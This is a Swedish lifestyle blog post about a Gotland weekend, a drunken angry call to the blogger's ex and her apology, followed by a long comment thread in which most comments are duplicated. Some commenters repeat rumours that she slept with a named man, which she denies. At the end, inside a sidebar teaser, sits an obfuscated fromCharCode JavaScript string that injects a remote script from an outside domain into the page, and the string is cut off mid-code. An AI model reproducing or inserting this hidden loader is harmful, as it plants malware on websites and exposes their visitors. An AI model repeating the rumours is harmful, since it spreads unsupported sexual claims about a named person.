Dags att stå sitt kast, krypa till korset och be om ursäkt….. -Förlåt!

OLYMPUS DIGITAL CAMERAHej fina du! Gotland. Visby. Det är något särkilt med denna underbara öjn. Jag ÄLSKAR Gotland. Jag var tveksam om jag skulle åka med Åza hit. Men är glad och Tacksam över att hon övertalade mig att följa med. Dessa dagar i min ”bubbla” med minimal kontakt och koll på omgivningen har gjort mig SÅ gott <3

Vi har njutit, ätit gott, varit på stranden, promenerat och ”bara varit”. Inga tider att passa. Inga måsten. 

FullSizeRender

Utsikten är MAGISK! Jag älskar kontrasterna, historien bakom alla gamla ruiner, och byggnader…image

Vi bodde hemma hos en god vän. Linus. Mysigt, lugnt och skönt! 

OLYMPUS DIGITAL CAMERA

Tusen, tusen Tack, världens bästa Linus för härliga dagar!!!

OLYMPUS DIGITAL CAMERAIMG_8232IMG_8243OLYMPUS DIGITAL CAMERA

IMG_8204

IMG_8202

OLYMPUS DIGITAL CAMERA

Vi har hunnit med lite av allt. Mys på Tofta beach…. OLYMPUS DIGITAL CAMERA IMG_8160

After beach på Kallis. Jo, Åza skrev i ett tidigare inlägg att hon behövt använda sin ”argröst. Nu ska jag förklara varför….

image

 

Jag har sedan mitt kaos under en längre period inte sovit särskilt bra. Tampats med ångesten. Både den dagliga ångestklumpen som hela tiden, även nu molar i magen. Och riktiga panikångest attacker. Jag har därför inte druckit alkohol på MÅNADER!

Denna helgen har vi druckit vin hemma på altanen, ätit någon middag ute osv.. och det har kännas helt okay. Vi kommer nu upp till Kallis som är afterbeachens afterbeach! Den är SÅ rolig!

Jag rycks snabbt med i stämningen, av den fantastiska omgivningen, musiken, solen, känsla, och alkoholen…. Livet känns på topp! JAG känner mig på topp. (För stunden)

Det jag kommer berätta om lite längre ner är ingenting jag är särskilt stolt över, tvärt om! Jag skäms som en hund!

men en ärlig blogg är en ärlig blogg….. 

FullSizeRender

Fina, goa underbara Frida <3 

FullSizeRender IMG_8156

FullSizeRender

Martin och Stoffe! IMG_8116När man hamnar i ”den där känslan” när man går in i dimman och livet känns på topp! Ruset tar över, problem, ångest och annat dämpas. Nästan försvinner helt för stunden. Då känns det bra. Riktgt bra! Jag studsade, skrattade och hoppade med alla andra. Jag kände mig ”fri” från all bekymmer och tyckte att nu, nu leker livet……

Min egen pappa har genom åren använt två uttryck ”dränka sina sorger” och att ”kröka huvudet i bitar” av både hans erfarenheter och mina egna så VET jag att det inte är någon bra kombo!!!!!!

Jag drack inte särskilt mycket, men det blev några glas för mycket i stekande sol uppe på hyllan. Allting kändes fortfarande bra tills Afterbeachen var slut och vi var påväg hem. Vi kramades, och minglade oss igenom folksamlingen och skulle gå ut.

Då tar jag upp min mobil och slänger ett öga på den. Där ligger två sms, ett värre än det andra. Och där rasar min värld igen. Det ena smset var privat och sårade mig. Det andra smset var gällande konkursen och mitt x, Ludvigs pappa.

Jag tar mig ut från Kallis ( TACK OCH LOV). Bort från folksamlingarna…

Där utanför en bit yttemigare längre bort från alla människor, tar jag upp mobilen igen,

jag KOKAR inombords, jag är så arg så att jag skakar. Jag ringer upp Ludvigs pappa. (mitt på dagen, inte nykter och INTE i mitt bästa jag)

Han svarar (dessvärre) och jag ger honom århundradets utskällning. Jag skriker, gråter, och skäller på honom. han var inte vatten värd! Ryggradslös, elak, vidrig, hemsk, jag drar upp saker som hänt genom dessa tio år. Använder ord som jag ALDRIG gör!

Jag beter mig så fruktansvärt illa att det inte finns någonting att säga till mitt försvar. Tio år av svek, frustration, sorg och ilska kom ut i ett enda samtal. Jag var som en elak kulspruta, han fick igen för ALLT han gjort (och inte gjort) Vårt tidigare förhållande, våran relation idag, saker som hänt för lääääängesen! Jag slutade inte, utan bara fortsatte och fortsatte tills….

 Det slutar med att ÅZA tar telefonen ur min hand. (Jag fortsätter skälla på Gillis men utan telefon) Hon tar över samtalet…. första gången dom pratar. Förklarar att detta samtalet är högst olämpligt då jag pga av smset och omständigheterna är ur balans. Hon avslutar det på ett bra sätt helt enkelt. Hon passar dessutom på att  lägga till att hon tycker mycket om hans kroppkakor (fniss). Jag fnissade inte då, men gör det nu…. Vi tar oss hem till huset, sätter oss på verandan.

Åza använder ”argrösten” och ger mig både alkohol och telefon förbud! (TACK!) Vi dricker lite kaffe, pratar och jag gråter lite till… Vi ringer upp Annelie som hänger med oss på FaceTime ganska länge. När jag sedan börjar ”landa” , nyktrar till och lugnat ner mig..

 Då Kommer den RIKTIGA ångesten. Jag skäms verkligen som en hund!  Den känslan är inte lätt. Ångesten man hade innan blev gånger tusen! Fy fan vilken hemsk känsla! Dessutom  HELT självförvållat!

När jag inser hur illa jag betett mig, när jag förstår vad jag gjort. Jag får efter många om och men okay från Åza att få ringa upp ludvigs pappa, och först då får tillbaka min mobil. Jag ringer, ber ganska kort men uppriktigt om ursäkt. och säger förlåt.

Först dagen efter när jag vaknar igen med en brutal ångest. Långt innan alla andra vaknar. Jag tar en PW, och ringer upp honom igen. Då pratade vi längre, jag bad om ursäkt igen. Han tog det bra, skrattade lite åt mig, berättade sin synvinkel på detta förskräckliga samtal och vi slöt fred på riktigt.

Vad har jag lärt mig av detta. JO, att jag fortfarande står fast vid min åsikt att det inte är någon bra kombo att dricka alkohol när man är ur balans.( vilket jag sällan gör) 

Men det är såhär jag funkar, gör jag bort mig. Vilket jag MER ÄN GJORDE, gentemot Ludvigs pappa. Då får man banen sig stå för det, göra om och göra rätt och be om ursäkt. Även om han sårat och svikit mig genom åren, och även om han gjort mycket eleket mot mig så finns det INGA ursäkter för mig att bete mig så som jag gjorde…. hmm. sagt och gjort.

NU släpper jag detta. Detta blev en lång del i detta inlägget. Men var bara en liten del av helgen. För övrigt var helgen lugn, skön och väldigt rolig! PÅ många sätt!! =)Resized_20160728_182624

 Från en sak till en annan, HUR mycket packning behöver man egentligen ha för ett par dagar i Visby? hehe! Åza och jag packade mer än väl!!!!!! Min ubersnygga väska från Inreda.com, är stor, vådligt stor! ( HÄR ) Vi hade ändå synkat oss, hade bara med oss EN hårfön osv… Hmm, stackars Linus måste trot att vi skulle flytta in och stanna för evigt! hehehe!

OLYMPUS DIGITAL CAMERAOLYMPUS DIGITAL CAMERAOLYMPUS DIGITAL CAMERAOLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERA20160731_120444

Vi lämnade Gotland för denna gång….  Linnea från GOTLANDS BÅTEN åkte med oss på vägen hem till Västervik. 

För fler bilder och uppdateringar ifrån en generellt sätt (bortsett några timmar den där eftermiddagen )  väldigt bra helg kika in på ÅZAS BLOGG HÄR .

imageNu i skrivande stund befinner jag mig efter en mellanlandning i Timmernabben. En kaffe och fika med min förra styvmamma innan jag ska till Öland, Köpingsvik och för upphämtning av Lilleman och Tezz. Ikväll åker vi hem till Sigtuna igen. Skönt. ÄNTLIGEN mamma vecka!!!!! <3 

Stor varm kram / My Martens

PS: ber även om ursäkt för att det kommit igenom elaka kommentarer med ”namedropping” i kommentarsfältet. Dessa är borttagna nu, kommer göra mitt bästa för att ha bättre koll och inte släppa igenom liknande! Ber er även tänka två gånger innan ni lämnar kommentarer som inte är vänliga. <3 kram igen!

99 Komentarer

 1. Du är himla härlig som faktiskt kan vara så ärlig, som berättar såna här grejer, det är ju mänskligt, händer många, men inte många som erkänner och berättar om det. Du är verkligen något helt annorlunda och speciellt. Stor kram fina du, snart är du en stark brutta igen men tills dess kommer du ändå alltid att duga och vara härlig. ?

 2. Haha känner igen mig:/ har jag saker inombords som spökar o jag inte är i balans ska jag INTE dricka!!!! Då åker mobben fram o jag säger o gör saker jag absolut inte skulle annars. Dumt o ger ÄNNU mer ångest.. Men va bra att du o Exet pratat ut ?

 3. Så pinsamt. Men han verkar ju inte tagit så illa vid sig. Värre för dig att behöva skämmas så för vad du gjort. Men vem har inte gjort bort sig på fyllan. Så du är i gott sällskap. Hoppas den här veckan blir bra för dig och Lilleman. Kram ?

 4. Du är himla härlig som faktiskt kan vara så ärlig, som berättar såna här grejer, det är ju mänskligt, händer många, men inte många som erkänner och berättar om det. Du är verkligen något helt annorlunda och speciellt. Stor kram fina du, snart är du en stark brutta igen men tills dess kommer du ändå alltid att duga och vara härlig. 😀

 5. Haha känner igen mig:/ har jag saker inombords som spökar o jag inte är i balans ska jag INTE dricka!!!! Då åker mobben fram o jag säger o gör saker jag absolut inte skulle annars. Dumt o ger ÄNNU mer ångest.. Men va bra att du o Exet pratat ut 🙂

 6. Oj trodde rubriken gällde andra saker, smart rubrik hehe…Så skönt att din skygghet förvann när du var barnledig så du kunde åka iväg och festa med vänner. Så fint hus ni fick bo i. Men du det sista efter PS gud så falskt! en kommentar om dig själv du raderat då…alltså My alla som läser bloggen är inte korkade! Ha det bra!

  • Jag tog bort alla kommentarer där namn på J.T, M.I M.C omnämndes dom skulle aldrig publicerats. Så nej, det var inte falskt… Lia dina kommentarer börjar också kännas tråkiga.. När man ser alla dina kometer du skrivit från detta IP nr så ställer jag mig frågan vem du egentligen är?

   • Fast jag tycker det känns falskt, kanske flera känner samma. Vadå från detta ip-nr? Ja jag skriver från en och samma dator eller vad menar du, detta ip-nr? Vem jag är… ja Lia 40 år vi har aldrig setts irl alltså. Ja trist det blir tråkigt men kan inte bara hylla allt, har oftast gjort det och skrivit snällt med råd och välmenande, ifrågasätter man någonting så anses det som mobbing hmm vilket det inte alls varit fån mig sida någonsin, tror ofta du missuppfattar..men men ska inte skriva mer då lägger ner denna blogg för mer o mer känns falskt tyvärr. Lycka till!

    • Jag förstår inte varför man måste ha en sån negativ underton som du har i dessa kommentarer!
     Det här med näthat är så old fashion! Jag förstår inte varför vi kvinnor inte bara hylla varandra istället! My mår, precis som hon beskriver, inte bra och ibland kan det vara nyttigt att få ut det i skrift! Kanske finns det någon annan där ute som läser det här och har varit igenom samma sak och som äntligen kan släppa att hon är helt ensam i världen med att känna sådär?
     Det är så jäkla typiskt dagens samhälle att man ska ha ”rätt” att skriva precis vad man vill till folk. Nej fy bubblan, har du inget snällt att skriva skriv inget!? Läs inte bloggen!? JAG FÖRSTÅR INTE varför man läser en blogg som man inte tycker om!

 7. Hej
  Vet du var det går att köpa de tre vita barstolarna du tagit bild på i Gotlande. Namn ,design?
  Tack på förhand/Åse

 8. Så pinsamt. Men han verkar ju inte tagit så illa vid sig. Värre för dig att behöva skämmas så för vad du gjort. Men vem har inte gjort bort sig på fyllan. Så du är i gott sällskap. Hoppas den här veckan blir bra för dig och Lilleman. Kram 😀

 9. Nä vet ni vad, nu börjar jag verkligen bli trött på de här personerna som hela tiden kommenterar negativt och försöker trissa upp stämningen genom att glida omkring på flera bloggar och strö lite skit om den ena och den andra här och där för att reta upp och skapa ännu mer konflikter. Jag blir mörkrädd när jag dessutom ser att det är många i 40 års åldern som roar sig med det här. Herregud medelålders människor, ni har inte lika mycket tid kvar av livet som ni hade när ni var 25 år kom ihåg det. Innan ni vet ordet av det är ni 65 och undrar vart livet tog vägen, livet går snabbt… Hur skulle det vara om ni satte igång att göra något trevligt och positivt i era liv istället för att hoppa mellan bloggar, kalla er olika namn och strö elakheter? Prova nåt nytt, nåt roligt, nåt som gör dig och din familj glad! Jag lovar det kommer att ge er mer än den korta stund av tillfredsställelse som spridandet av elakheter i kommentarsfälten ger er! Lycka till! ?

 10. Älskade du! Mycket vatten ska rinna under broarna innan vi slår igen de blå. Hoppas inte jag behöver beslagta din mobil igen men gör det sju dagar i veckan om det skulle behövas! ❤ Å

 11. Oj trodde rubriken gällde andra saker, smart rubrik hehe…Så skönt att din skygghet förvann när du var barnledig så du kunde åka iväg och festa med vänner. Så fint hus ni fick bo i. Men du det sista efter PS gud så falskt! en kommentar om dig själv du raderat då…alltså My alla som läser bloggen är inte korkade! Ha det bra!

  • Jag tog bort alla kommentarer där namn på J.T, M.I M.C omnämndes dom skulle aldrig publicerats. Så nej, det var inte falskt… Lia dina kommentarer börjar också kännas tråkiga.. När man ser alla dina kometer du skrivit från detta IP nr så ställer jag mig frågan vem du egentligen är?

   • Fast jag tycker det känns falskt, kanske flera känner samma. Vadå från detta ip-nr? Ja jag skriver från en och samma dator eller vad menar du, detta ip-nr? Vem jag är… ja Lia 40 år vi har aldrig setts irl alltså. Ja trist det blir tråkigt men kan inte bara hylla allt, har oftast gjort det och skrivit snällt med råd och välmenande, ifrågasätter man någonting så anses det som mobbing hmm vilket det inte alls varit fån mig sida någonsin, tror ofta du missuppfattar..men men ska inte skriva mer då lägger ner denna blogg för mer o mer känns falskt tyvärr. Lycka till!

    • Jag förstår inte varför man måste ha en sån negativ underton som du har i dessa kommentarer!
     Det här med näthat är så old fashion! Jag förstår inte varför vi kvinnor inte bara hylla varandra istället! My mår, precis som hon beskriver, inte bra och ibland kan det vara nyttigt att få ut det i skrift! Kanske finns det någon annan där ute som läser det här och har varit igenom samma sak och som äntligen kan släppa att hon är helt ensam i världen med att känna sådär?
     Det är så jäkla typiskt dagens samhälle att man ska ha ”rätt” att skriva precis vad man vill till folk. Nej fy bubblan, har du inget snällt att skriva skriv inget!? Läs inte bloggen!? JAG FÖRSTÅR INTE varför man läser en blogg som man inte tycker om!

 12. Hej
  Vet du var det går att köpa de tre vita barstolarna du tagit bild på i Gotlande. Namn ,design?
  Tack på förhand/Åse

 13. Vad skönt med lite avbrott i vardagen. Tack för din ärliga blogg och så synd att det ska behöva vara så tråkig ton på kommentarerna för dej.

 14. Nä vet ni vad, nu börjar jag verkligen bli trött på de här personerna som hela tiden kommenterar negativt och försöker trissa upp stämningen genom att glida omkring på flera bloggar och strö lite skit om den ena och den andra här och där för att reta upp och skapa ännu mer konflikter. Jag blir mörkrädd när jag dessutom ser att det är många i 40 års åldern som roar sig med det här. Herregud medelålders människor, ni har inte lika mycket tid kvar av livet som ni hade när ni var 25 år kom ihåg det. Innan ni vet ordet av det är ni 65 och undrar vart livet tog vägen, livet går snabbt… Hur skulle det vara om ni satte igång att göra något trevligt och positivt i era liv istället för att hoppa mellan bloggar, kalla er olika namn och strö elakheter? Prova nåt nytt, nåt roligt, nåt som gör dig och din familj glad! Jag lovar det kommer att ge er mer än den korta stund av tillfredsställelse som spridandet av elakheter i kommentarsfälten ger er! Lycka till! 🙂

 15. Älskade du! Mycket vatten ska rinna under broarna innan vi slår igen de blå. Hoppas inte jag behöver beslagta din mobil igen men gör det sju dagar i veckan om det skulle behövas! ❤ Å

 16. Kanske inte det bästa sättet på att kommunicera med sitt ex, men se det som att du fick i alla fall ur dig vad du tänkte o tyckte. Liksom rensade luften. Ni kan ju prata med varandra nu efteråt o det är det viktigaste ?

 17. Vad skönt med lite avbrott i vardagen. Tack för din ärliga blogg och så synd att det ska behöva vara så tråkig ton på kommentarerna för dej.

 18. Där alkoholen går in går vettet ut brukar det sägas. Är man dessutom ur balans så <3
  Det förde ju iaf med sig att ni rensat luften nu ?
  Var rädd om dig!

 19. Det är sådant som händer… Inte så konstigt att det hände dig, efter allt jobbigt du har varit igenom denna sommar. Men du är verkligen en strong och härlig tjej, som vågar stå för den du är. Därför är jag säker på att du kommer gå vidare och få ett underbart liv. Det önskar jag av hela hjärtat, dig och Lilleman. Tur också att du har en kompis som Åza. Sådana vänner behövs ibland…

 20. Kanske inte det bästa sättet på att kommunicera med sitt ex, men se det som att du fick i alla fall ur dig vad du tänkte o tyckte. Liksom rensade luften. Ni kan ju prata med varandra nu efteråt o det är det viktigaste 🙂

 21. Guud vilken fin klänning den där vita som är längre där bak och kortare fram, den vill jag ha trots jag snart fyller 60, kan jag ha en sån ändå?;) Klart jag kan, det är endast andras åsikter som hindrar en men inte i mitt fall, en sån ska jag ha och känna mig jättefin i:) Kram och Lycka till med livet

 22. Ibland tippar lixom livet över, likväl går det vidare, vi lär oss av det som händer…
  Det finns inga ”fantom” människor, alla har vi våra bagage, du lixom jag lixom…
  Att säga förlåt & mena det med hjärtat är en fin egenskap <3 & du är fin <3
  Har undrat, du & Magdalena som var/är? så fina vänner, så mycket ni gjorde ihop, er gemenskap, alla bilder, er innerlighet, den finns kanske kvar fast den inte syns?
  Varm kram till dej kämpe <3

 23. Hmm…mycket betoning på ärlig blogg. Men helt utan alkohol har du ju inte varit i månader. Du drack ju i New York, på midsommarafton etc. Absolut inget fel med det, men om det nu ska vara så ärligt.

  • WTF???? Vad nu?
   inte EN droppe på midsommar! Ett glas Cosmopolitan som jag smakade för första gången…. (Sex & The city fan) uppe på en Rooftop i NYC, delat med en väninna dessutom.
   så näääääääää ingen alkohol på flera månader! ?

   • Men nu ljuger du allt My, och talar emot vad du tidigare skrivit i bloggen… Den 25 juni skrev du:
    ”Och vet du vad. Inga sömntabletter. drack något glas bubbel till middagen och ett glas rosè på bryggan”

 24. Vore kanske på sin plats att du angav att vinet Perfect Day var i samarbete med / sponsrat av. Nu har vi sett samma flaskbild i två inlägg. Vi vet att det är systrarna Widells? Vin och förstår att du har fått betalt för att sponsra det, men du måste ange det förstås..

  • Hej Ewa! Nej, detta är inte ett sponsrat inlägg.
   våran bag in box tog slut, vi missade att bolaget stängde kl 15:00, ringde då till våran vän som fick ställa upp med flaskor ? så det var en ren slump. Oavsett vem som står bakom flaskan eller inte.
   Mina köpta inlägg markeras, bokförs, faktureras och tas upp. Bolaget ligger under revision och granskas alltså av Skatteverket. För ANDRA gången, felfritt.
   Varmt välkommen att granska den också om du känner att du har fler oförskämda frågor, med en touch av bitter smak i tonen!
   Bara för att jag lägger upp med Statoil i bakgrunden så betyder det nödvändigast inte att statiol har köpt marknadsföring hos mig. När jag dricker mjölk i kaffet så innebär inte det att Arla ligger bakom inlägget!
   Jag har lagt upp flera bilder i New York med Donald Trumps hotell i bakgrunden. Donald sponsrar mig Heller inte… Tänk efter två gånger innan du kommer med dina påhopp är du rar….
   Men bara för att jag blir lite nyfiken på hur du tänker, OM detta hade varit sponsrat inlägg, och det då hade markerats skrivits om det och länkats till återförsäljare. Varför hade du då fått ont i magen av just det? Missförstå mig inte nu, det är en vänlig fråga som följd av din kommentar.. /My

 25. Där alkoholen går in går vettet ut brukar det sägas. Är man dessutom ur balans så <3
  Det förde ju iaf med sig att ni rensat luften nu 🙂

  Var rädd om dig!

 26. Det är sådant som händer… Inte så konstigt att det hände dig, efter allt jobbigt du har varit igenom denna sommar. Men du är verkligen en strong och härlig tjej, som vågar stå för den du är. Därför är jag säker på att du kommer gå vidare och få ett underbart liv. Det önskar jag av hela hjärtat, dig och Lilleman. Tur också att du har en kompis som Åza. Sådana vänner behövs ibland…

 27. Guud vilken fin klänning den där vita som är längre där bak och kortare fram, den vill jag ha trots jag snart fyller 60, kan jag ha en sån ändå?;) Klart jag kan, det är endast andras åsikter som hindrar en men inte i mitt fall, en sån ska jag ha och känna mig jättefin i:) Kram och Lycka till med livet

 28. Ibland tippar lixom livet över, likväl går det vidare, vi lär oss av det som händer…
  Det finns inga ”fantom” människor, alla har vi våra bagage, du lixom jag lixom…
  Att säga förlåt & mena det med hjärtat är en fin egenskap <3 & du är fin <3

  Har undrat, du & Magdalena som var/är? så fina vänner, så mycket ni gjorde ihop, er gemenskap, alla bilder, er innerlighet, den finns kanske kvar fast den inte syns?

  Varm kram till dej kämpe <3

 29. Hmm…mycket betoning på ärlig blogg. Men helt utan alkohol har du ju inte varit i månader. Du drack ju i New York, på midsommarafton etc. Absolut inget fel med det, men om det nu ska vara så ärligt.

  • WTF???? Vad nu?

   inte EN droppe på midsommar! Ett glas Cosmopolitan som jag smakade för första gången…. (Sex & The city fan) uppe på en Rooftop i NYC, delat med en väninna dessutom.

   så näääääääää ingen alkohol på flera månader! 🙂

   • Men nu ljuger du allt My, och talar emot vad du tidigare skrivit i bloggen… Den 25 juni skrev du:

    ”Och vet du vad. Inga sömntabletter. drack något glas bubbel till middagen och ett glas rosè på bryggan”

 30. Vore kanske på sin plats att du angav att vinet Perfect Day var i samarbete med / sponsrat av. Nu har vi sett samma flaskbild i två inlägg. Vi vet att det är systrarna Widells? Vin och förstår att du har fått betalt för att sponsra det, men du måste ange det förstås..

  • Hej Ewa! Nej, detta är inte ett sponsrat inlägg.

   våran bag in box tog slut, vi missade att bolaget stängde kl 15:00, ringde då till våran vän som fick ställa upp med flaskor 🙂 så det var en ren slump. Oavsett vem som står bakom flaskan eller inte.

   Mina köpta inlägg markeras, bokförs, faktureras och tas upp. Bolaget ligger under revision och granskas alltså av Skatteverket. För ANDRA gången, felfritt.

   Varmt välkommen att granska den också om du känner att du har fler oförskämda frågor, med en touch av bitter smak i tonen!
   Bara för att jag lägger upp med Statoil i bakgrunden så betyder det nödvändigast inte att statiol har köpt marknadsföring hos mig. När jag dricker mjölk i kaffet så innebär inte det att Arla ligger bakom inlägget!
   Jag har lagt upp flera bilder i New York med Donald Trumps hotell i bakgrunden. Donald sponsrar mig Heller inte… Tänk efter två gånger innan du kommer med dina påhopp är du rar….

   Men bara för att jag blir lite nyfiken på hur du tänker, OM detta hade varit sponsrat inlägg, och det då hade markerats skrivits om det och länkats till återförsäljare. Varför hade du då fått ont i magen av just det? Missförstå mig inte nu, det är en vänlig fråga som följd av din kommentar.. /My

 31. Detta behöver du inte publicera men det står massa skit i flaschback om ert ”bloggkrig”som en del kallar det. Det står på flaschback att du legat med hedman. Hur lätt det än det är för mig att säga det så säger ja det ändå. Försök att skaka av dig skiten. Försök att vara stark. Snart har det blåst över och folket har hittat nåt nytt att gotta sig i

   • Fast det är klart, hedman är ju pappa till Graafs söner och dem kanske har ett o annat ihop;) ingen ironi där bara ett konstanterande.

    • Hej! Magnus och jag har inte legat med varandra. Bara ännu ett rykte och påstående helt utan substans. Magnus är en god vän OCH kollega….. Nog om honom! ? / My

 32. Detta behöver du inte publicera men det står massa skit i flaschback om ert ”bloggkrig”som en del kallar det. Det står på flaschback att du legat med hedman. Hur lätt det än det är för mig att säga det så säger ja det ändå. Försök att skaka av dig skiten. Försök att vara stark. Snart har det blåst över och folket har hittat nåt nytt att gotta sig i

   • Fast det är klart, hedman är ju pappa till Graafs söner och dem kanske har ett o annat ihop;) ingen ironi där bara ett konstanterande.

    • Hej! Magnus och jag har inte legat med varandra. Bara ännu ett rykte och påstående helt utan substans. Magnus är en god vän OCH kollega….. Nog om honom! 🙂 / My

 33. Och nu har en annan bloggare börjat släppa igenom kommentarer där ditt namn nämns. Det står bla att du är väldigt manipulerande. Känns som om denna bloggare vill hämnas för att du släppt igenom kommentarer. Man skulle kunna tro att ni går i årskurs 5 båda två!

 34. Har läst på flera ställen att du legat med Magnus Hedman. Om så är fallet så är ju du singel och gör vad du vill….han däremot är ju i ett förhållande så det borde väl vara han som ska ”skämmas”? Känns som att alla hackar på dig. Berätta din version så slipper du spekulationer och rykten, bara ett tips. (Kanske släpper du inte igenom denna kommentar, men i alla fall…)
  Kram

  • Hej! Magnus och jag har inte legat med varandra. Bara ännu ett rykte och påstående helt utan substans. Magnus är en god vän OCH kollega….. Nog om honom! ? / My

 35. Men varför är alla så misstänksamma och bedömande – hur orkar ni !! Peppa, stötta o lyft varandra i stället. Vissa saker har vi läsare inte med att göra!! Heja dig My

 36. För mig är det ofattbart hur folk kan skriva så mycket elakt…..Jag beundrar allt du klarar My. Lite tråkigt och jobbigt att det blev så för dej, den kvällen på Gotland, men inte så konstigt med allt du gått och går igenom. Försöker alltid se att saker som händer leder framåt och till nåt bättre ? Du och exet rensade luften lite, kanske blir bättre på sikt.
  Var rädd om dig nu vackra, fina My och lycka till med allt. Kramar <3
  (Jag har förresten sökt runt på rosa champagneglas likt de som finns på bilderna ? Vet du var de går att köpa eller vad det står för vit text på dem?)

 37. Förresten så undrar jag hur du kan släppa igenom kommentarer med Hedmans namn. Oavsett om ryktet stämmer eller ej så kanske det inte är så roligt för honom och hans närstående.

  • Hej! Magnus och jag har inte legat med varandra. Bara ännu ett rykte och påstående helt utan substans. Magnus är en god vän OCH kollega….. Nog om honom! ? / My

 38. Och nu har en annan bloggare börjat släppa igenom kommentarer där ditt namn nämns. Det står bla att du är väldigt manipulerande. Känns som om denna bloggare vill hämnas för att du släppt igenom kommentarer. Man skulle kunna tro att ni går i årskurs 5 båda två!

 39. Men HERREGUD vilket tjafs om vem My ev. har gått till sängs med. My är singel och de män hon träffar och ev. går till sängs med är INGENTING vi har med att göra.

 40. Har läst på flera ställen att du legat med Magnus Hedman. Om så är fallet så är ju du singel och gör vad du vill….han däremot är ju i ett förhållande så det borde väl vara han som ska ”skämmas”? Känns som att alla hackar på dig. Berätta din version så slipper du spekulationer och rykten, bara ett tips. (Kanske släpper du inte igenom denna kommentar, men i alla fall…)
  Kram

  • Hej! Magnus och jag har inte legat med varandra. Bara ännu ett rykte och påstående helt utan substans. Magnus är en god vän OCH kollega….. Nog om honom! 🙂 / My

 41. Men varför är alla så misstänksamma och bedömande – hur orkar ni !! Peppa, stötta o lyft varandra i stället. Vissa saker har vi läsare inte med att göra!! Heja dig My

 42. För mig är det ofattbart hur folk kan skriva så mycket elakt…..Jag beundrar allt du klarar My. Lite tråkigt och jobbigt att det blev så för dej, den kvällen på Gotland, men inte så konstigt med allt du gått och går igenom. Försöker alltid se att saker som händer leder framåt och till nåt bättre 😉 Du och exet rensade luften lite, kanske blir bättre på sikt.
  Var rädd om dig nu vackra, fina My och lycka till med allt. Kramar <3
  (Jag har förresten sökt runt på rosa champagneglas likt de som finns på bilderna 😉 Vet du var de går att köpa eller vad det står för vit text på dem?)

 43. Förresten så undrar jag hur du kan släppa igenom kommentarer med Hedmans namn. Oavsett om ryktet stämmer eller ej så kanske det inte är så roligt för honom och hans närstående.

  • Hej! Magnus och jag har inte legat med varandra. Bara ännu ett rykte och påstående helt utan substans. Magnus är en god vän OCH kollega….. Nog om honom! 🙂 / My

 44. Jag är i princip nykterist (däremot röker jag gärna en joint då och då med någon älskare, men det får man ju knappt säger i Sverige, för att inte klassas som tung narkoman) däremot kan jag tycka att man inte känner varandra på djupet förrän man har en bläcka tillsammans.. Har ett gäng sisters in crimes från barndomen, och inget större intresse och behov av nya vänninor, det låter krasst men men. Däremot har jag fått en ny soulmate, och hon var rejält på puttilurven när vi träffades… Jag var uteläst med hunden i ett 40 grader hett Tel Aviv utan vare sig mobil, pengar, vatten med husnyckeln någonstans i parken… Grannkvinnan aka väninnan lyckades koordinera husägaren i Japan, få en husnyckel tillsänd från en släkting på landet, erbjuda mig pengar, vatten, mat husrum på stående fot till en total stranger….

 45. Men HERREGUD vilket tjafs om vem My ev. har gått till sängs med. My är singel och de män hon träffar och ev. går till sängs med är INGENTING vi har med att göra.

 46. Jag är i princip nykterist (däremot röker jag gärna en joint då och då med någon älskare, men det får man ju knappt säger i Sverige, för att inte klassas som tung narkoman) däremot kan jag tycka att man inte känner varandra på djupet förrän man har en bläcka tillsammans.. Har ett gäng sisters in crimes från barndomen, och inget större intresse och behov av nya vänninor, det låter krasst men men. Däremot har jag fått en ny soulmate, och hon var rejält på puttilurven när vi träffades… Jag var uteläst med hunden i ett 40 grader hett Tel Aviv utan vare sig mobil, pengar, vatten med husnyckeln någonstans i parken… Grannkvinnan aka väninnan lyckades koordinera husägaren i Japan, få en husnyckel tillsänd från en släkting på landet, erbjuda mig pengar, vatten, mat husrum på stående fot till en total stranger….

 47. Alkohol kan verkligen ”förstöra”, men tycker det var strongt av dig att ringa tillbaka och be om ursäkt! Det visar på att man insett vad man gjort fel och vill rätt till det.

 48. Jag tror alla någon gång har gjort något sådant i ett inte helt nyktert tillstånd men få har nog ryggraden att faktiskt reda ut det sen. All heder åt dig som gjorde det och säkert kom det bra saker ur detta också <3

 49. Alkohol kan verkligen ”förstöra”, men tycker det var strongt av dig att ringa tillbaka och be om ursäkt! Det visar på att man insett vad man gjort fel och vill rätt till det.

 50. Jag tror alla någon gång har gjort något sådant i ett inte helt nyktert tillstånd men få har nog ryggraden att faktiskt reda ut det sen. All heder åt dig som gjorde det och säkert kom det bra saker ur detta också <3

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,3